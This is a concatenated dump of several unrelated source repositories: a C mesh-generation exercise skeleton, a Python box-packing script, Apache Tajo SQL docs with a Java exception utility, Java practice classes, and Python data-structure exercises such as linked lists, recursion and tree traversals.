void saveToObj(struct Mesh *m, REAL *u, REAL factor, const char* filename);
#endif
<file_sep>/*****************************************************************************/
/* */
/* (meshGen.c) */
/* */
/*****************************************************************************/
#ifdef SINGLE
#define REAL float
#else /* not SINGLE */
#define REAL double
#endif /* not SINGLE */
#include <stdio.h>
#include <stdlib.h>
#ifndef TRIANGLE_H
#define TRIANGLE_H
#include "triangle.h" // this file is NOT in the public domains !!!!
/* <NAME> */
/* 2360 Woolsey #H */
/* Berkeley, California 94705-1927 */
/* <EMAIL> */
#endif
#include "triangleIO.h"
#include "mesh.h"
#include <math.h>
#include <assert.h>
/*****************************************************************************/
/* */
/* Our main function */
/* */
/*****************************************************************************/
/* Driver: read a polygonal contour (outer boundary + one cavity) from
 * contour.txt, triangulate it with Shewchuk's Triangle, build the Mesh
 * structure, then (TODO) compute and validate per-vertex gradients.
 * NOTE(review): the fopen result is not checked -- a missing contour.txt
 * will crash on the first fscanf; confirm whether that is acceptable here. */
int main()
{
	// Define an input and output data structure for triangle
	struct triangulateio in, out;
	// Read formated input representing the contour
	FILE * pFile = fopen ("contour.txt","r");
	int nb_point_exterior, nb_point_cavity;
	fscanf (pFile, "%i %i\n", &nb_point_exterior, &nb_point_cavity);
////////////////////////////////////////////////////////////////////////////////////
//TODO to change: you should first initialize those values
//	in.numberofpoints
//	in.pointlist
	printf("%i %i\n",nb_point_exterior, nb_point_cavity); //TODO STEP 1 & ?: to be replaced
////////////////////////////////////////////////////////////////////////////////////
	// read exterior contour
	char test1;
	fscanf (pFile, "%c\n", &test1);
	assert(test1=='#');
	REAL x,y;
	for(int i=0; i<nb_point_exterior; ++i) {
		fscanf (pFile, "%lf %lf\n", &x, &y);
////////////////////////////////////////////////////////////////////////////////////
		printf("%f %f\n",x, y); //TODO STEP1: to be replaced
////////////////////////////////////////////////////////////////////////////////////
	}
	// read contour of cavity
	char test2;
	fscanf (pFile, "%c\n", &test2);
	assert(test2=='#');
	struct vec2 hole_center; // coordinates of a point inside cavity
	hole_center.x = 0.0;
	hole_center.y = 0.0;
	for(int i=0; i<nb_point_cavity; ++i) {
		fscanf (pFile, "%lf %lf\n", &x, &y);
////////////////////////////////////////////////////////////////////////////////////
		printf("%f %f\n",x, y); //TODO STEP2: to be replaced
////////////////////////////////////////////////////////////////////////////////////
	}
	fclose (pFile);
////////////////////////////////////////////////////////////////////////////////////
//TODO STEP3
	in.numberofsegments = 0;
////////////////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////////////////
//TODO STEP4
//TODO value to modify after first step is working (usefull to know which
// point belong to boundary)
	in.pointmarkerlist = (int *) malloc(in.numberofpoints * sizeof(int));
	for(int i=0; i<in.numberofpoints; i++) {
		in.pointmarkerlist[i] = 0;
	}
////////////////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////
//TODO Step 5
	in.numberofholes = 0;
//TODO init in.numberofholes and in.holelist
///////////////////////////////////////////////////
	// Can be ignored safely
	in.numberofpointattributes = 0;
	in.pointattributelist = (REAL *) NULL;
	in.numberofregions = 0;
	in.regionlist = (REAL *) NULL;
	printf("Input point set:\n\n");
	report(&in, 1, 0, 0, 0, 0, 0);
	/* Make necessary initializations so that Triangle can return a triangulation in out */
	out.pointlist = (REAL *) NULL; /* Not needed if -N switch used. */
	/* Not needed if -N switch used or number of point attributes is zero: */
	out.pointattributelist = (REAL *) NULL;
	out.pointmarkerlist = (int *) NULL; /* Not needed if -N or -B switch used. */
	out.trianglelist = (int *) NULL; /* Not needed if -E switch used. */
	/* Not needed if -E switch used or number of triangle attributes is zero: */
	out.triangleattributelist = (REAL *) NULL;
	out.neighborlist = (int *) NULL; /* Needed only if -n switch used. */
	/* Needed only if segments are output (-p or -c) and -P not used: */
	out.segmentlist = (int *) NULL;
	/* Needed only if segments are output (-p or -c) and -P and -B not used: */
	out.segmentmarkerlist = (int *) NULL;
	out.edgelist = (int *) NULL; /* Needed only if -e switch used. */
	out.edgemarkerlist = (int *) NULL; /* Needed if -e used and -B not used. */
////////////////////////////////////////////////////////////////
//TODO : test in order (p=PSLG, c=convex hull, z=zero-indexed, e=edges, a=area bound, q=quality)
	triangulate("pcze", &in, &out, (struct triangulateio *) NULL);
	// triangulate("pze", &in, &out, (struct triangulateio *) NULL);
	// triangulate("pzea50.0", &in, &out, (struct triangulateio *) NULL);
	// triangulate("pzea50.0q", &in, &out, (struct triangulateio *) NULL);
////////////////////////////////////////////////////////////////
	// Allow the use of program showme to visualize results
	saveToFiles(&out);
	// Build the mesh data-structure
	struct Mesh mesh;
	moveAndInit(&out, &mesh);
	// Compute gradient
////////////////////////////////////////////////////////////////
//TODO STEP 6
	for(int i = 0; i<mesh.n_points; ++i )
	{
		//TODO test case to check validity of gradient computation
		// Initialize function values and closed-form gradients
	}
	for(int i = 0; i<mesh.n_points; ++i )
	{
		//TODO Compute gradients
	}
	for(int i = 0; i<mesh.n_points; ++i )
	{
		//TODO Compare closed-form and numerical gradients
	}
////////////////////////////////////////////////////////////////
	// Free all the memory
	free(in.pointlist);
	free(in.pointattributelist);
	free(in.pointmarkerlist);
	free(in.regionlist);
	free(mesh.v_points);
	free(mesh.v_triangles);
	free(mesh.v_edges);
	free(mesh.v_boundary_id);
	free(mesh.nbNeighbors);
	free(mesh.neighbors);
	free(mesh.barycoord);
	return 0;
}
| b737afac3caefdd96425bdaa63d69c6dd14f2f1e | [
"C"
] | 7 | C | czanni/mesh4music | 78d4275007946d141656a474f4327f7cac8f48b7 | 20e67f9e4e3fb942b9475fc3807e097994d390d0 |
refs/heads/main | <file_sep># 🧑💻 relaxdays-3d_packing
This project was created in the Relaxdays Code Challenge Vol. 1.
See the [hackathon homepage](https://sites.google.com/relaxdays.de/hackathon-relaxdays/startseite) for more information.
Our participant IDs in the challenge were `CC-VOL1-54` and `CC-VOL1-62`.
We haven't really come far with our implementation. It is just callable with an example inside the Code and without Frontend.<file_sep># -*- coding: utf-8 -*-
"""
Created on Sat Mar 13 22:22:51 2021
@author: Kevin
"""
def getMaxPackageKoordniate(packages):
    """Return [max_x, max_y, max_z] over all packages ([0, 0, 0] if empty)."""
    dims = [0, 0, 0]
    for package in packages:
        dims = [max(current, candidate) for current, candidate in zip(dims, package)]
    return dims
def pickBiggestPackage(packages):
    """Return (index, volume) of the largest-volume package.

    Ties keep the earliest index; an empty list yields (-1, 0).
    """
    best_index, best_vol = -1, 0
    for i, (x, y, z) in enumerate(packages):
        volume = x * y * z
        if volume > best_vol:
            best_index, best_vol = i, volume
    return best_index, best_vol
def fittingPackages(package_types, package):
    """Indices of package_types whose x/y/z each cover the package's x/y/z.

    No rotation is considered: each axis is compared independently.
    """
    return [
        i
        for i, ptype in enumerate(package_types)
        if all(ptype[axis] >= package[axis] for axis in range(3))
    ]
def pickLowestCost(package_costs, allowed_packages):
    """Return the index (from allowed_packages) with the lowest cost.

    Returns -1 when allowed_packages is empty. Ties keep the earliest
    allowed index (strict-less comparison).

    IMPROVEMENT: the original imported numpy inside the function just for
    np.infty; float('inf') removes that dependency with identical behavior.
    """
    costs = float('inf')
    best_index = -1
    for i in allowed_packages:
        if costs > package_costs[i]:
            best_index = i
            costs = package_costs[i]
    return best_index
def calcCosts(used_packages, prices):
    """Total price of the chosen package-type indices."""
    return sum(prices[pack] for pack in used_packages)
if __name__ == '__main__':
    # Example input: available box types, their prices, and the articles to pack.
    package_types = [[10,20,15], [10,10,10]]
    package_costs = [50, 25]
    packages = [[10,10,5],[5,5,5],[9,4,5],[10,20,10],[10,10,10]]
    # One chosen box type per article; positions are placeholders (origin).
    used_packages = []
    article_positions = []
    for i, package in enumerate(packages):
        # Box types the article fits into (no rotation).
        fitting_packs = fittingPackages(package_types, package)
        # Cheapest of the fitting box types (-1 if nothing fits).
        lowest_cost_pack = pickLowestCost(package_costs, fitting_packs)
        used_packages.append(lowest_cost_pack)
        article_positions.append([i, 0,0,0])
    print(used_packages)
    print(article_positions)
    print(f'Costs: {calcCosts(used_packages, package_costs)}')
| ba1a4f18f9bf3f55e20bc5766993c7e7dbd646c6 | [
"Markdown",
"Python"
] | 2 | Markdown | ZapCupy/relaxdays-3d_packing | 81c70f3d0aa8539473223803a2379d6533ef3b75 | 3df555af18d7ee052fdbfe9ae09328c159369594 |
refs/heads/master | <file_sep>============================
SQL Expressions
============================
-------------------------
Arithmetic Expressions
-------------------------
-------------------------
Type Casts
-------------------------
A type cast converts data of one type into data of another type. Tajo provides two type cast syntaxes:
.. code-block:: sql
CAST ( expression AS type )
expression::type
In addition, several functions are provided for type conversion. Please refer to :doc:`data_type_func_and_operators` and :doc:`datetime_func_and_operators`.
-------------------------
String Constants
-------------------------
A string constant is an arbitrary sequence of characters bounded by single quotes (``'``):
.. code-block:: sql
'tajo'
-------------------------
Function Call
-------------------------
The syntax for a function call consists of the name of a function and its argument list enclosed in parentheses:
.. code-block:: sql
function_name ([expression [, expression ... ]] )
For more information about functions, please refer to `:doc:functions`.<file_sep>/*
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apache.tajo.exception;
import com.google.common.collect.Maps;
import org.apache.tajo.error.Errors.ResultCode;
import org.apache.tajo.rpc.protocolrecords.PrimitiveProtos.ReturnState;
import java.sql.SQLException;
import java.util.Map;
import static org.apache.tajo.exception.ReturnStateUtil.isError;
/**
 * Helpers for translating Tajo {@code ResultCode}s and {@code ReturnState}s
 * into {@link java.sql.SQLException}s carrying an appropriate SQLSTATE.
 */
public class SQLExceptionUtil {

  /** Maps Tajo result codes to ANSI SQLSTATE strings. */
  private static final Map<ResultCode, String> SQLSTATES = Maps.newHashMap();

  static {
    // TODO - all SQLStates should be filled in
    SQLSTATES.put(ResultCode.FEATURE_NOT_SUPPORTED, "0A000");
    SQLSTATES.put(ResultCode.NOT_IMPLEMENTED, "0A000");
    SQLSTATES.put(ResultCode.SYNTAX_ERROR, "42601");
  }

  /**
   * Returns true if the exception's SQLSTATE matches the given result code.
   * Throws TajoInternalError for codes without a registered SQLSTATE.
   */
  public static boolean isThisError(SQLException e, ResultCode code) {
    if (SQLSTATES.containsKey(code)) {
      return e.getSQLState().equals(SQLSTATES.get(code));
    } else {
      throw new TajoInternalError("Unknown error code: " + code.name());
    }
  }

  /** Converts an error-carrying ReturnState into a SQLException and throws it. */
  public static void throwIfError(ReturnState state) throws SQLException {
    if (isError(state)) {
      throw toSQLException(state);
    }
  }

  /** Builds a SQLException; codes without a mapped SQLSTATE fall back to '42000'. */
  private static SQLException toSQLException(ResultCode code, String message) throws SQLException {

    if (SQLSTATES.containsKey(code)) {

      return new SQLException(
          message,
          SQLSTATES.get(code),
          code.getNumber()
      );

    } else {
      // If there is no SQLState corresponding to error code,
      // It will make SQLState '42000' (Syntax Error Or Access Rule Violation).
      return new SQLException(
          message,
          "42000",
          ResultCode.SYNTAX_ERROR_OR_ACCESS_RULE_VIOLATION_VALUE
      );
    }
  }

  /** Converts a TajoException into a SQLException, preserving its message. */
  public static SQLException toSQLException(TajoException e) throws SQLException {
    return toSQLException(e.getErrorCode(), e.getMessage());
  }

  /** Converts a ReturnState into a SQLException, preserving its message. */
  public static SQLException toSQLException(ReturnState state) throws SQLException {
    return toSQLException(state.getReturnCode(), state.getMessage());
  }

  /** Builds a SQLException with a formatted message for the given code and args. */
  public static SQLException makeSQLException(ResultCode code, String ...args) {
    if (SQLSTATES.containsKey(code)) {
      return new SQLException(
          ErrorMessages.getMessage(code, args),
          SQLSTATES.get(code),
          code.getNumber());
    } else {
      // If there is no SQLState corresponding to error code,
      // It will make SQLState '42000' (Syntax Error Or Access Rule Violation).
      return new SQLException(
          code.name(),
          "42000",
          code.getNumber());
    }

  }

  /** Wraps a connection failure cause into the standard connection error. */
  public static SQLException makeUnableToEstablishConnection(Throwable t) {
    return makeSQLException(
        ResultCode.CLIENT_UNABLE_TO_ESTABLISH_CONNECTION, t.getMessage());
  }
}
| 836ac5e5cdef1b44c5d003b67904f952314537fc | [
"Java",
"reStructuredText"
] | 2 | reStructuredText | adbadb/tajo | 22ab1cf974031bc58d2ff1a6d34102c0c4997184 | 9ef8010c149d6bdbfe2beefca0ebf491918f8e4a |
refs/heads/master | <repo_name>sree285/core-java<file_sep>/core-java/src/com/core/practice/superexample/SuperMain.java
package com.core.practice.superexample;
public class SuperMain {

	/** Demo driver: exercises Child's own, inherited, and super-delegating methods. */
	public static void main(String[] args) {
		final Child child = new Child();
		System.out.println(child.getChildClassName());
		System.out.println(child.getParentClassName());
		System.out.println(child.callParentMethod());
	}
}
<file_sep>/core-java/src/com/core/practice/staticexample/StaticMain.java
package com.core.practice.staticexample;
import com.core.practice.singleton.MySingleton;
public class StaticMain {

	/** Demonstrates static members on Employee and the MySingleton accessor. */
	public static void main(String[] args) {
		// First employee; Employee.company is a static field shared by all instances.
		Employee first = new Employee();
		first.setEmpName("Nirmal");
		first.setEmpId("1");
		first.setGrade("PA");
		first.setSalary("5LPA");
		first.getEmpId();
		System.out.println("Employee:" + first.getEmpId() + " " + first.getEmpName() + " " + Employee.company);

		// Second employee sees the very same static company value.
		Employee second = new Employee();
		second.setEmpName("Kumar");
		second.setEmpId("1");
		second.setGrade("A");
		second.setSalary("6LPA");
		System.out.println("Employee:" + second.getEmpId() + " " + second.getEmpName() + " " + Employee.company);

		System.out.println("Date:" + Employee.getCurrentDate());

		// Static factory accessor of the singleton.
		MySingleton singleton = MySingleton.getInstance();
		System.out.println(singleton.getName());
	}
}
<file_sep>/core-java/src/com/core/practice/interfaceabstract/Employee.java
package com.core.practice.interfaceabstract;
/**
 * Abstract-class example: subclasses must supply name and grade, while the
 * school name has a shared concrete default.
 */
public abstract class Employee {

	// Must be implemented by subclasses.
	abstract String getStudentName();

	// Must be implemented by subclasses.
	abstract String getStudentGrade();

	// Concrete default shared by all subclasses.
	String getStudentSchool() {
		return "Bschool";
	}
}
<file_sep>/core-java/src/com/core/practice/interfaceabstract/Student.java
package com.core.practice.interfaceabstract;
/**
 * Interface counterpart to the abstract-class example. Interface methods are
 * implicitly public abstract, and fields are implicitly public static final,
 * so the explicit modifiers below are redundant (kept for illustration).
 */
public interface Student {
	String getStudentName();
	String getStudentGrade();
	public static final int name = 5;
	public abstract void print();
}
<file_sep>/core-java/src/com/core/practice/singleton/MySingleton.java
package com.core.practice.singleton;
public class MySingleton {
private static MySingleton myObj;
/**
* Create private constructor
*/
private MySingleton() {
}
/**
* Create a static method to get instance.
*/
public static MySingleton getInstance() {
if (myObj == null) {
myObj = new MySingleton();
}
return myObj;
}
public void getSomeThing() {
System.out.println("first time new instance");
}
public void callAgain() {
System.out.println("second time same instance");
}
public String getName() {
int c = 5 + 3;
return String.valueOf(c);
}
}
<file_sep>/core-java/src/com/core/practice/interfaceabstract/EmployeeExtend.java
package com.core.practice.interfaceabstract;
public class EmployeeExtend extends Employee {

	/** Concrete name for the abstract-class demo. */
	@Override
	String getStudentName() {
		return "Name";
	}

	/** Concrete grade for the abstract-class demo. */
	@Override
	String getStudentGrade() {
		return "grade";
	}

	/** Driver: calls an overridden method and the inherited concrete one. */
	public static void main(String[] args) {
		EmployeeExtend employee = new EmployeeExtend();
		employee.getStudentGrade();
		employee.getStudentSchool();
	}
}
| 8bc08d69e489745d986d929a68aaf9a63eef484b | [
"Java"
] | 6 | Java | sree285/core-java | abc58932dee48a49b11e13ecf2c049b08105c765 | 436eba432fb42a22e347f70fa62613a101f04f8e |
refs/heads/master | <repo_name>bdaniel16/PracticeQuestionsAndConcepts<file_sep>/Concepts/Graphs.py
class Graph:
    """Adjacency-list graph skeleton for V vertices (methods are still stubs).

    BUG FIX: the constructor was named ``__init`` (missing trailing
    underscores), so Python never treated it as the initializer and
    ``Graph(V)`` raised TypeError.
    """

    def __init__(self, V):
        # Stub: store/build adjacency structures for V vertices here.
        pass

    def adj(self, v):
        # Stub: return the vertices adjacent to v.
        pass

    def addEdge(self, w):
        # Stub: add an edge.
        pass
class ListNode(object):
    """Singly linked list node holding a value and a next pointer."""

    def __init__(self, val):
        self.val = val
        self.next = None


class MyLinkedList(object):
    """Minimal singly linked list (LeetCode 707 style).

    BUG FIXES versus the original:
    - ``addAtIndex(0, v)`` crashed (``_getNodeAtIndex(-1)`` returned None and
      ``prev.next`` raised AttributeError); index <= 0 now prepends.
    - ``addAtIndex`` past the end crashed for the same reason; it is now a no-op.
    - ``deleteAtIndex`` crashed on an empty list and when index == length;
      out-of-range deletes are now no-ops.
    """

    def __init__(self):
        self.head = None

    def addAtHead(self, val):
        """Insert val as the new head."""
        node = ListNode(val)
        node.next = self.head
        self.head = node

    def _getNodeAtIndex(self, index):
        """Return the node at 0-based ``index`` or None if out of range."""
        if index < 0:
            return None
        curr = self.head
        i = 0
        while curr and i < index:
            curr = curr.next
            i += 1
        return curr

    def addAtTail(self, val):
        """Append val at the end of the list."""
        node = ListNode(val)
        if not self.head:
            self.head = node
            return
        curr = self.head
        while curr.next is not None:
            curr = curr.next
        curr.next = node

    def addAtIndex(self, index, val):
        """Insert val before the index-th node; index <= 0 prepends,
        index == length appends, larger indices are ignored."""
        if index <= 0:
            self.addAtHead(val)
            return
        prev = self._getNodeAtIndex(index - 1)
        if prev is None:
            return  # index beyond the end: no-op (used to crash)
        node = ListNode(val)
        node.next = prev.next
        prev.next = node

    def deleteAtIndex(self, index):
        """Delete the index-th node if it exists; otherwise do nothing."""
        if index < 0 or self.head is None:
            return
        if index == 0:
            self.head = self.head.next
            return
        prev = self._getNodeAtIndex(index - 1)
        if prev is None or prev.next is None:
            return  # nothing to delete at this index (used to crash)
        prev.next = prev.next.next
if __name__ == "__main__":
    # Smoke-test driver: build a list, mutate it, then dump remaining values.
    obj = MyLinkedList()
    obj.addAtHead(5)
    obj.addAtTail(7)
    obj.addAtHead(10)
    obj.addAtHead(32)
    obj.addAtIndex(2, 56)
    obj.deleteAtIndex(0)
    obj.deleteAtIndex(2)
    obj.deleteAtIndex(8)
    # Walk the list and print each value (with a blank line between entries).
    curr = obj.head
    while curr is not None:
        print(curr.val)
        print("\n")
curr = curr.next<file_sep>/DijkstraShortestPath.py
"""
ds: 1 hash[hash] to hold the graph [node + cost]
1 hash to node + cost
1 hash to node and parent
1 list to hold processed nodes
algo: find lowest cost node
while node-
get cost
get neighbors
for each neighbor-
update cost
update parent
add node to processed
get next lowest cost node
to get lowest cost node:
for each node in costs-
update lowest cost
update lowest cost node
:return lowest cost node
"""
<file_sep>/PerfectSquare.py
class PS(object):
    """Perfect-square check without floating-point sqrt."""

    def isPerfectSquare(self, num):
        """
        Return True iff num is a perfect square.

        IMPROVEMENT: replaces the O(sqrt(n)) trial loop with math.isqrt.
        Behavior for num < 1 (including 0) matches the original, which
        returned False for those inputs.

        :type num: int
        :rtype: bool
        """
        import math  # local import keeps the module's import surface unchanged

        if num < 1:
            return False
        root = math.isqrt(num)
        return root * root == num
if __name__ == "__main__":
    # Demo: 14 is not a perfect square, so this prints False.
    ps = PS()
    print(ps.isPerfectSquare(14))
# *************************************
# Contains solutions for:
# simple string reverse
# recursion string reverse
# Swap alternate pairs of linked lists.
# get row of Pascal triangle ( where current row value is sum of prev row column values)
# get fibonacci number using memoization
# climbing stairs using memoization
# *************************************
from typing import List
def strRev(ind, strg):
    # Print the characters of `strg` in reverse order, one per line, by
    # recursing to the end of the string before printing (post-order prints).
    if not strg or ind >= len(strg):
        return
    strRev(ind + 1, strg)
    print(strg[ind])
# "hello" -> "oellh" -> "olleh"
# "banana" -> "aabanb" -> "anbaab" ->"ananab"
def strRevRecursion(i, j, s):
    """Reverse list ``s`` in place between indices i and j (two-pointer swap)."""
    if i >= j:
        return
    s[i], s[j] = s[j], s[i]
    strRevRecursion(i + 1, j - 1, s)
# Swap alternate pairs of linked lists.
class ListNode:
    """Singly linked list node with optional value and successor."""

    def __init__(self, val=0, next=None):
        self.val, self.next = val, next
class Solution:
    """Recursion practice: pair swap, Pascal row, Fibonacci, stair climbing.

    BUG FIX: ``climbStairs`` computed the answer via ``cbstHelper`` but
    discarded it and implicitly returned None; the result is now returned.
    (Annotations for ListNode are stringified so the class does not depend
    on import-time evaluation of that name.)
    """

    def __init__(self):
        # Memo table shared across fibonacciMemoization calls.
        self.fib_map = {}

    def swapPairs(self, head: "ListNode") -> "ListNode":
        """Swap every two adjacent nodes recursively; return the new head."""
        if not head or head.next is None:
            return head
        first_node = head
        second_node = head.next
        # Recurse on the rest, then reverse this pair's links.
        first_node.next = self.swapPairs(second_node.next)
        second_node.next = first_node
        return second_node

    def getPascalRow(self, rowIndex: int) -> List[int]:
        """Row ``rowIndex`` (0-based) of Pascal's triangle.

        Uses f(i, j) = f(i-1, j-1) + f(i-1, j) with f(i, 0) = f(i, i) = 1.
        """
        return [self.helper(rowIndex, j) for j in range(rowIndex + 1)]

    def helper(self, i, j):
        # Border entries of the triangle are 1.
        if i == j or j == 0:
            return 1
        return self.helper(i - 1, j - 1) + self.helper(i - 1, j)

    def fibonacciMemoization(self, n):
        """n-th Fibonacci number, memoized in self.fib_map."""
        if n in self.fib_map:
            return self.fib_map[n]
        if n == 0:
            return 0
        if n < 2:
            return 1
        res = self.fibonacciMemoization(n - 1) + self.fibonacciMemoization(n - 2)
        self.fib_map[n] = res
        return res

    def climbStairs(self, n):
        """Distinct ways to climb n stairs taking 1 or 2 steps at a time."""
        return self.cbstHelper(0, n, {})

    def cbstHelper(self, i, n, memo):
        # Count paths from step i to step n; memo caches per-position counts.
        if i == n:
            return 1
        if i > n:
            return 0
        if i in memo:
            return memo[i]
        memo[i] = self.cbstHelper(i + 1, n, memo) + self.cbstHelper(i + 2, n, memo)
        return memo[i]
if __name__ == "__main__":
    # Earlier experiments kept for reference:
    #st_list = ["h", "e", "l", "l", "o"]
    #st_list = ["b", "a", "n", "a", "n", "a"]
    # strRev(0, str)
    #strRevRecursion(0, len(st_list)-1, st_list)
    #print(st_list)
    sol = Solution()
    #print(sol.getPascalRow(1))
    #print(sol.fibonacciMemoization(0))
    print(sol.climbStairs(3))
class ListNode(object):
    """Singly linked list node for the cycle-detection demo."""

    def __init__(self, val):
        self.val, self.next = val, None
class Solution:
    """Floyd cycle detection on singly linked lists."""

    def hasCycle(self, head: "ListNode") -> bool:
        """Return True iff the list contains a cycle (tortoise/hare)."""
        slow = fast = head
        while fast and fast.next:
            slow = slow.next
            fast = fast.next.next
            if slow is fast:
                return True
        return False

    def detectCycle(self, head: "ListNode") -> "ListNode":
        """Return the node where the cycle begins, or None if acyclic.

        BUG FIX: the original returned the tortoise/hare *meeting* node,
        which is generally not the cycle entry. Floyd's phase 2 is now
        applied: after the pointers meet, one pointer restarts from head
        and both advance one step at a time; they meet exactly at the
        cycle's first node.
        """
        slow = fast = head
        while fast and fast.next:
            slow = slow.next
            fast = fast.next.next
            if slow is fast:
                # Phase 2: locate the cycle entry.
                probe = head
                while probe is not slow:
                    probe = probe.next
                    slow = slow.next
                return probe
        return None
if __name__ == "__main__":
    # Build 3 -> 2 -> 0 -> -4 with the tail looping back to the node holding 2.
    sol = Solution()
    n1 = ListNode(3)
    n2 = ListNode(2)
    n3 = ListNode(0)
    n4 = ListNode(-4)
    n1.next = n2
    n2.next = n3
    n3.next = n4
    n4.next = n2
    #print(sol.hasCycle(n1))
    # Expected cycle entry value: 2.
    print(sol.detectCycle(n1).val)
print(sol.detectCycle(n1).val)<file_sep>/Concepts/ArrayManipulation.py
def mergeArray(nums1, nums2):
    # Merge sorted nums2 into sorted nums1 in place, assuming nums1 carries
    # enough trailing padding slots to absorb all of nums2.
    # NOTE(review): the `k > len(nums2)` guard appears to work only when the
    # length of nums1's valid prefix happens to line up with len(nums2); the
    # LeetCode-88 formulation passes m and n explicitly for this reason.
    # Confirm intended inputs before relying on this function.
    if nums2:
        i = 0
        k = 0
        while i < len(nums2):
            if nums2[i] < nums1[k]:
                # Shift the tail of nums1 right by one, then drop nums2[i] in slot k.
                for j in range(len(nums1) - 1, k, -1):
                    nums1[j] = nums1[j - 1]
                nums1[k] = nums2[i]
                i += 1
                k += 1
            elif k > len(nums2):
                # Assumed to be past the valid prefix: write remaining nums2 directly.
                nums1[k] = nums2[i]
                i += 1
                k += 1
            else:
                k += 1
def deleteArrayElements(nums, val):
    """Remove every occurrence of ``val`` from ``nums``.

    Returns (new_length, new_list). The input list is left unmodified.

    BUG FIX: the original advanced ``i`` after slicing off index 0, so a
    second ``val`` that slid into index 0 was skipped (e.g. [3, 3, 1] with
    val=3 kept a stray 3). It also mutated the caller's list when removing
    middle elements. A single filtering pass fixes both and is O(n).
    """
    remaining = [x for x in nums if x != val]
    return len(remaining), remaining
if __name__ == '__main__':
    # Merge-sort test inputs kept for reference:
    # nums1 = [-1,0,0,3,3,3,0,0,0]
    # nums2 = [1,2,2]
    # mergeArray(nums1, nums2)
    # nums1 = [1, 2, 3, 0, 0, 0]
    # nums2 = [2, 5, 6]
    # Demo: remove all 3s from the list and show the new length/contents.
    nums = [3,2,2,3]
    val = 3
    length, nums = deleteArrayElements(nums, val)
    print(length)
    print(nums)
import queue
class TreeNode(object):
    """Binary tree node with a value and optional children."""

    def __init__(self, val, left=None, right=None):
        self.val, self.left, self.right = val, left, right
def preOrderTraversal(root):
    """Iterative preorder (root, left, right).

    Returns the list of visited values, or None for an empty tree
    (matching the original contract).
    """
    if root is None:
        return None
    order = []
    pending = [root]
    while pending:
        node = pending.pop()
        order.append(node.val)
        # Push right before left so the left subtree is processed first.
        for child in (node.right, node.left):
            if child is not None:
                pending.append(child)
    return order
def inorderTraversal(root):
    """Iterative inorder (left, root, right).

    Returns the list of visited values, or None for an empty tree
    (matching the original contract).
    """
    if root is None:
        return None
    order = []
    ancestors = []
    node = root
    while ancestors or node:
        # Descend as far left as possible, stacking ancestors on the way.
        while node is not None:
            ancestors.append(node)
            node = node.left
        node = ancestors.pop()
        order.append(node.val)
        node = node.right
    return order
def postOrderTraversal(root):
    """Iterative postorder (left, right, root) with a single stack.

    Returns the list of visited values, or None for an empty tree.

    BUG FIX: the original tested ``curr.right.val not in traversal`` to
    decide whether the right subtree was already emitted, which breaks as
    soon as two nodes share a value (and costs O(n) per check). We instead
    remember the last *node* emitted, which identifies the visited child by
    identity regardless of duplicate values.
    """
    if root is None:
        return None
    traversal = []
    stack = []
    curr = root
    last_emitted = None
    while stack or curr:
        # Descend along the left spine.
        while curr is not None:
            stack.append(curr)
            curr = curr.left
        peek = stack[-1]
        if peek.right is not None and peek.right is not last_emitted:
            curr = peek.right  # right subtree not yet visited
        else:
            stack.pop()
            traversal.append(peek.val)
            last_emitted = peek
            curr = None
    return traversal
def postOrderTraveralUsingTwoStacks(root):
    """Postorder via reversed modified-preorder (root, right, left).

    Returns the list of visited values, or None for an empty tree.
    """
    if root is None:
        return None
    reversed_order = []
    pending = [root]
    while pending:
        node = pending.pop()
        reversed_order.append(node.val)
        if node.left is not None:
            pending.append(node.left)
        if node.right is not None:
            pending.append(node.right)
    # Reversing (root, right, left) yields (left, right, root).
    return reversed_order[::-1]
def postOrderTraversalUsingOneStack(root):
    """
    One-stack postorder: the right child is pushed *below* its parent so
    that, when popped, finding the right child on top of the stack signals
    "visit right subtree first". A lot of edge cases while popping stck
    and accessing node's children have to be considered.
    NOTE(review): node comparisons use `==`, which for plain node objects
    is identity; duplicate *values* are safe here, but custom __eq__ on
    nodes would break this -- confirm if nodes ever override equality.
    """
    traversal = []
    stck = []
    curr = root
    while True:
        # Push the left spine; each node's right child goes under it.
        while curr:
            if curr.right:
                stck.append(curr.right)
            stck.append(curr)
            curr = curr.left
        if stck:
            curr = stck.pop()
        # If the popped node's right child sits on top, process it first.
        if curr and curr.right and stck and curr.right == stck[len(stck) - 1]:
            prev = curr
            curr = stck.pop()
            stck.append(prev)
        elif curr:
            traversal.append(curr.val)
            curr = None
        if len(stck) < 1:
            break
    return traversal
def levelOrderTraversal(root):
    """Breadth-first (level order) traversal.

    Returns a flat list of values visited level by level, left to right,
    or None for an empty tree (consistent with the other traversals here).

    BUG FIX: the original created the queue and result list but never
    performed the traversal, so it always returned None.
    """
    if root is None:
        return None
    traversal = []
    pending = queue.Queue()
    pending.put(root)
    while not pending.empty():
        node = pending.get()
        traversal.append(node.val)
        if node.left is not None:
            pending.put(node.left)
        if node.right is not None:
            pending.put(node.right)
    return traversal
def generateVeryLargeInput(arr):
    # Build a (partial) binary tree from a flat value list: the first three
    # values form the root and its two children, then pairs of values are
    # attached alternately down the left spine (lnode) and the right spine
    # (rnode), flipping the `l` toggle each step.
    # NOTE(review): None entries in arr become TreeNode(None) rather than
    # missing children, and most of each pair's subtree is never revisited --
    # this only reproduces the shape the tests need, not the full array tree.
    root = rnode = lnode = None
    l = False
    i = 0
    while i < len(arr):
        if not root:
            # Consume three values: root plus its immediate children.
            root = TreeNode(arr[i], left=TreeNode(arr[i + 1]), right=TreeNode(arr[i + 2]))  # 64
            lnode = root.left  # 12
            rnode = root.right  # 18
            l = True
            i += 3
        elif l:
            # Attach a pair under the current left-spine node, then descend left.
            if lnode:
                lnode.left = TreeNode(arr[i])  #
                lnode.right = TreeNode(arr[i + 1])  #
                lnode = lnode.left
            else:
                lnode = None
            i += 2
            l = False
        else:
            # Attach a pair under the current right-spine node, then descend right.
            if rnode:
                rnode.left = TreeNode(arr[i])  #
                rnode.right = TreeNode(arr[i + 1])  #
                rnode = rnode.right
            else:
